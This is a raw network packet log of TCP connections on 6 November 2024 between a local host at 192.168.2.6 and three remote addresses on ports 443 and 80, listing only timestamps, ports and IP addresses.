Nov 6, 2024 17:02:54.522600889 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.637979031 CET	443	56891	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.639543056 CET	56891	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.639564037 CET	443	56891	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.797384024 CET	443	56891	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.797473907 CET	443	56891	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.797524929 CET	56891	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.798000097 CET	56891	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.801630020 CET	56885	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.802937031 CET	56897	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.807065010 CET	80	56885	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:54.807125092 CET	56885	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.808059931 CET	80	56897	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:54.808144093 CET	56897	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.808233976 CET	56897	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:54.813024044 CET	80	56897	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:54.987761974 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.988285065 CET	56893	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.988306046 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.988740921 CET	56893	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:54.988748074 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:54.997239113 CET	80	56892	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:54.998536110 CET	56898	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.998584032 CET	443	56898	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:54.998646021 CET	56898	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.998956919 CET	56898	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:54.998970032 CET	443	56898	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:55.032422066 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.032830954 CET	56894	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.032856941 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.033685923 CET	56894	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.033691883 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.052134037 CET	56892	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:55.118904114 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.119049072 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.119229078 CET	56893	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.119256973 CET	56893	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.119270086 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.119282961 CET	56893	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.119287968 CET	443	56893	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.121922016 CET	56900	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.121968985 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.122031927 CET	56900	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.122186899 CET	56900	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.122201920 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.167068005 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.167356014 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.167449951 CET	56894	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.167475939 CET	56894	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.167486906 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.167501926 CET	56894	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.167507887 CET	443	56894	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.170386076 CET	56901	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.170417070 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.170480013 CET	56901	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.170634985 CET	56901	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.170645952 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.234751940 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.235266924 CET	56895	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.235287905 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.235744953 CET	56895	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.235752106 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.308676004 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.309221029 CET	56896	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.309231043 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.309775114 CET	56896	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.309777975 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.433209896 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.434250116 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.434365034 CET	56895	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.434612989 CET	56895	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.434639931 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.434654951 CET	56895	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.434659958 CET	443	56895	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.437469959 CET	56902	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.437516928 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.437612057 CET	56902	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.437819958 CET	56902	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.437835932 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.447299957 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.447535992 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.447632074 CET	56896	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.447913885 CET	56896	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.447913885 CET	56896	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.447926998 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.447938919 CET	443	56896	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.450473070 CET	56903	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.450510979 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.450653076 CET	56903	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.450747013 CET	56903	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.450761080 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.607403994 CET	443	56898	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:55.609364033 CET	56898	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:55.609388113 CET	443	56898	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:55.676589966 CET	80	56897	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:55.677902937 CET	56904	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:55.677958965 CET	443	56904	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:55.678117037 CET	56904	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:55.678613901 CET	56904	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:55.678625107 CET	443	56904	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:55.724025011 CET	56897	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:55.772195101 CET	443	56898	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:55.772286892 CET	443	56898	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:55.772437096 CET	56898	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:55.772844076 CET	56898	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:55.776618004 CET	56892	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:55.777422905 CET	56905	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:55.781922102 CET	80	56892	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:55.782001019 CET	56892	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:55.782538891 CET	80	56905	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:55.782793045 CET	56905	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:55.782998085 CET	56905	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:55.787868977 CET	80	56905	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:55.865813017 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.866272926 CET	56900	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.866312027 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.867008924 CET	56900	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.867021084 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.906584024 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.907063007 CET	56901	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.907095909 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:55.907732964 CET	56901	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:55.907737970 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.010636091 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.010730028 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.011287928 CET	56900	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.011344910 CET	56900	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.011363983 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.011379004 CET	56900	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.011385918 CET	443	56900	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.014080048 CET	56906	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.014117956 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.014219999 CET	56906	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.014379978 CET	56906	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.014389038 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.038109064 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.038395882 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.038585901 CET	56901	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.038904905 CET	56901	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.038925886 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.038999081 CET	56901	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.039005041 CET	443	56901	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.042906046 CET	56907	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.042949915 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.043055058 CET	56907	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.043414116 CET	56907	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.043427944 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.186507940 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.186975956 CET	56903	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.187011003 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.187427044 CET	56903	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.187432051 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.308145046 CET	443	56904	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:56.309866905 CET	56904	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:56.309907913 CET	443	56904	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:56.314908981 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.315160990 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.315234900 CET	56903	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.315335035 CET	56903	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.315335035 CET	56903	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.315382004 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.315397024 CET	443	56903	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.318080902 CET	56908	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.318131924 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.318223000 CET	56908	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.318368912 CET	56908	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.318383932 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.330773115 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.331336975 CET	56902	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.331362009 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.331800938 CET	56902	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.331805944 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.463682890 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.464061022 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.469881058 CET	56902	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.469921112 CET	56902	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.469935894 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.469954014 CET	56902	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.469959021 CET	443	56902	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.472482920 CET	56909	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.472516060 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.472654104 CET	56909	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.472793102 CET	56909	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.472805977 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.472815037 CET	443	56904	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:56.472881079 CET	443	56904	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:56.474148035 CET	56904	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:56.474512100 CET	56904	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:56.478338003 CET	56910	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:56.483280897 CET	80	56910	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:56.483475924 CET	56910	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:56.483591080 CET	56910	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:56.488797903 CET	80	56910	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:56.649746895 CET	80	56905	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:56.651416063 CET	56911	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:56.651457071 CET	443	56911	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:56.651521921 CET	56911	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:56.651779890 CET	56911	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:56.651788950 CET	443	56911	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:56.692775965 CET	56905	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:56.772711039 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.773199081 CET	56907	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.773232937 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.773669958 CET	56907	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.773677111 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.842351913 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.842885017 CET	56906	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.842914104 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.843342066 CET	56906	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.843349934 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.903131962 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.903992891 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.904061079 CET	56907	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.904122114 CET	56907	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.904122114 CET	56907	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.904145956 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.904159069 CET	443	56907	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.906928062 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.906955957 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.907017946 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.907159090 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.907172918 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.976655006 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.976797104 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.976996899 CET	56906	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.977107048 CET	56906	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.977127075 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.977138996 CET	56906	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.977144957 CET	443	56906	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.979729891 CET	56913	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.979749918 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:56.979835987 CET	56913	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.980101109 CET	56913	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:56.980113029 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.056740046 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.057295084 CET	56908	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.057329893 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.057759047 CET	56908	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.057766914 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.539729118 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.539800882 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.539854050 CET	56908	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.540019989 CET	56908	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.540019989 CET	56908	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.540038109 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.540047884 CET	443	56908	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.540529966 CET	80	56910	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:57.542493105 CET	56914	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:57.542526007 CET	443	56914	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:57.542591095 CET	56914	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:57.543055058 CET	56914	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:57.543066978 CET	443	56914	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:57.543144941 CET	443	56911	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:57.543607950 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.543618917 CET	56915	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.543661118 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.543711901 CET	56915	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.543895006 CET	56909	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.543910980 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.544420004 CET	56909	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.544425011 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.544770002 CET	56915	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.544790030 CET	443	56915	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.545021057 CET	56911	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:57.545037031 CET	443	56911	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:57.564851046 CET	80	56910	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:57.564898968 CET	56910	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:57.673804045 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.674438000 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.674468994 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.674911022 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.674916983 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.681308031 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.681832075 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.681924105 CET	56909	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.681958914 CET	56909	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.681958914 CET	56909	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.681974888 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.681986094 CET	443	56909	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.684634924 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.684654951 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.684721947 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.684848070 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.684860945 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.713875055 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.713902950 CET	443	56911	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:57.714158058 CET	443	56911	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:57.714313030 CET	56911	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:57.714349985 CET	56913	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.714375019 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.714607000 CET	56911	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:57.714828968 CET	56913	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.714837074 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.809902906 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.809921980 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.809963942 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.810029030 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.810075045 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.810285091 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.810309887 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.810323954 CET	56912	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.810331106 CET	443	56912	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.813261986 CET	56917	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.813313007 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.813503981 CET	56917	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.813577890 CET	56917	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.813585997 CET	443	56917	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.843621969 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.843769073 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.843839884 CET	56913	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.843992949 CET	56913	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.844027996 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.844043016 CET	56913	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.844049931 CET	443	56913	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.847009897 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.847047091 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:57.847156048 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.847366095 CET	56918	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:57.847377062 CET	443	56918	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.182554960 CET	443	56914	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:58.184503078 CET	56914	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:58.184529066 CET	443	56914	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:58.359781027 CET	443	56914	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:58.359862089 CET	443	56914	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:58.359922886 CET	56914	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:58.360460043 CET	56914	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:58.363879919 CET	56910	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:58.365209103 CET	56919	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:58.369462967 CET	80	56910	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:58.369546890 CET	56910	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:58.370109081 CET	80	56919	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:58.370182991 CET	56919	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:58.370336056 CET	56919	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:58.375880003 CET	80	56919	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:58.416131973 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.416898012 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.416917086 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.417371035 CET	56916	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:58.417376995 CET	443	56916	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:58.545676947 CET	443	56916	13.107.246.45	192.168.2.6
